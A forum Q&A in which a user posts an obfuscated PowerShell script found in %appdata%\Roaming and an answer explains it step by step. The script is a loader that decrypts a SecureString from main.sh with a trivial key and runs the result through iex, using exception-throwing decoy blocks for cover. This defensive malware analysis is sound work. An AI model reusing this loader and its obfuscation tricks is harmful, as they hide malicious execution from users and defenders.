Search code examples
powershellvirus

Windows PowerShell Malicious script

I found this code in a folder into %appdata%Roaming :( Can anybody tell me wat it does?

try{Get-Transaction:Test-Connection
New-WindowsImage:Register-ArgumentCompleter
Get-HgsTrace:Set-VMMigrationNetwork}catch{

$sexq="pZsvjJoFqppwjeLWZTreMIrzqZarktnOJMwsddyKhIBlweDpKblExIlrlfWkOVsb" -replace "IoG|ZsvjJ|Fqpp|jeLWZTr|MIrzqZa|ktnOJMw|ddyK|IBlw|DpKb|ExIlr|fWkOVsb";
try{Save-VM:Get-Variable
Set-RuleOption:Get-WindowsSearchSetting
Remove-PSReadLineKeyHandler:Remove-VMResourcePool}catch{}
$ILRorUyZk=Get-Process $sexq;
if ($ILRorUyZk.length -lt 2){
$uMBOKUgyzWiOSfp=@(1..16);
$HXZBX=[System.Runtime.InteropServices.Marshal]
$iuOpORc= Get-Content "main.sh"
$kvsqQjipalHpywxaPr= ConvertTo-SecureString $iuOpORc -key $uMBOKUgyzWiOSfp;
$reEFPHvZmrf = $HXZBX::SecureStringToBSTR($kvsqQjipalHpywxaPr);
try{Remove-ItemProperty:Show-WindowsDeveloperLicenseRegistration
Connect-WSMan:Confirm-SecureBootUEFI
Revoke-VMConnectAccess:Suspend-VMReplication}catch{$upd='LmzXprwH';}
$zcthAxqVWAZrzkx = $HXZBX::PtrToStringAuto($reEFPHvZmrf);
try{Move-Item:Find-Package
Update-FormatData:Invoke-Item
ForEach-Object:New-TlsSessionTicketKey}catch{}
$zcthAxqVWAZrzkx -replace "UGSttylIkwIFr" | iex;}}

Thank you!

Solution

  • Let's see. The first try-catch might be obfuscation to hide from cursory examination. The catch (pun intended) is in the the catch block. It contains the payload, so the try block is intended to throw an exception.

    $sexq="pZsvjJoFqppwjeLWZTreMIrzqZarktnOJMwsddyKhIBlweDpKblExIlrlfWkOVsb" `
  -replace "IoG|ZsvjJ|Fqpp|jeLWZTr|MIrzqZa|ktnOJMw|ddyK|IBlw|DpKb|ExIlr|fWkOVsb";

    The variable contains obfuscated word powershell, which is revealed by replacing a lot of nonsense strings with nothing. There is -replce with search argument but not replacement argument, thus it just removes fillers IoG, ZsvjJ...

    $ILRorUyZk=Get-Process $sexq;
if ($ILRorUyZk.length -lt 2){
$uMBOKUgyzWiOSfp=@(1..16);

    Here Get-Process is used to find if Powershell is running. If multiple processes aren't being run, create an array containing values 1-16. This might be to avoid situations in which interactive sessions are active.

    $HXZBX=[System.Runtime.InteropServices.Marshal]

    Create an alias to InterOpServices' Marshal. Nothing troublesome here, legitimate use is to save in typing and reading long namespace descriptors.

    $iuOpORc= Get-Content "main.sh"
$kvsqQjipalHpywxaPr= ConvertTo-SecureString $iuOpORc -key $uMBOKUgyzWiOSfp;

    A file main.sh is read. It contains a SecureString, encrypted with key 1,2,3...,15,16.

    $reEFPHvZmrf = $HXZBX::SecureStringToBSTR($kvsqQjipalHpywxaPr);

    SecureString payload is converted to BSTR. This is to decrypt the SecureString, I guess.

    try{Remove-ItemProperty:Show-WindowsDeveloperLicenseRegistration
Connect-WSMan:Confirm-SecureBootUEFI
Revoke-VMConnectAccess:Suspend-VMReplication}catch{$upd='LmzXprwH';}

    Another "let's hide in the catch block" that sets a variable with nonsense content. No idea why.

    $zcthAxqVWAZrzkx = $HXZBX::PtrToStringAuto($reEFPHvZmrf);
try{Move-Item:Find-Package
Update-FormatData:Invoke-Item
ForEach-Object:New-TlsSessionTicketKey}catch{}

    Another a step in decryption, followed by weird stuff in another try-catch block without obvious intent.

    $zcthAxqVWAZrzkx -replace "UGSttylIkwIFr" | iex;}}

    The final payload from SecureString conversion is filtered to remove obfuscation, and the result is passed for execution to Invoke-Expression.

    To see what's the payload, do as per Jeramy's comment. Replacing variable names to a bit more descriptive:

    $key=@(1..16)
$encryptedStr = Get-Content "main.sh"
$secString = ConvertTo-SecureString $encryptedStr -key $key
$bstrPtr = $HXZBX::SecureStringToBSTR($secString) 
$obfuscatedStr = $HXZBX::PtrToStringAuto($bstrPtr)
$obfuscatedStr -replace "UGSttylIkwIFr"